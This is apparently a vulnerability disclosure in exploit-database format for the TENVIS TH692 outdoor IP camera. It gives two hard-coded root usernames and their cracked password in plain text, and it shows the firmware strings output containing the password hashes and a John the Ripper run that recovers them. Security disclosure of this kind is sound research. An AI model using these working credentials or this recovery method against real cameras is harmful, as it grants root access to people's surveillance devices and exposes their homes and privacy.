TH692 Outdoor P2P HD Waterproof IP Camera - Hard-Coded Credentials

Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials
Date: 4/16/2016
Exploit Author: DLY
Vendor: TENVIS Technology Co., Ltd
Product: TH692- Outdoor P2P HD Waterproof IP Camera
Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html
Affected version: TH692C-V. 16.1.16.1.1.4
firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov

user: Mroot
pass:cat1029
user:Wproot
pass: cat1029

root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root
rootpath
rootfs crc %lx
------------------start upgrade rootfs------------------
------------------end upgrade rootfs------------------
bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)
nfsroot
7root
Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot
k01000100    rootbox    nohelp info
root::0:
Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh
nfsroot
pivot_root
xswitch_root
chroot
nfsroot
root@kali:~# john --show ipcamhashes
Mroot:cat1029:0:0::/root:/bin/sh
Wproot:cat1029:0:0::/root:/bin/sh

2 password hashes cracked, 0 left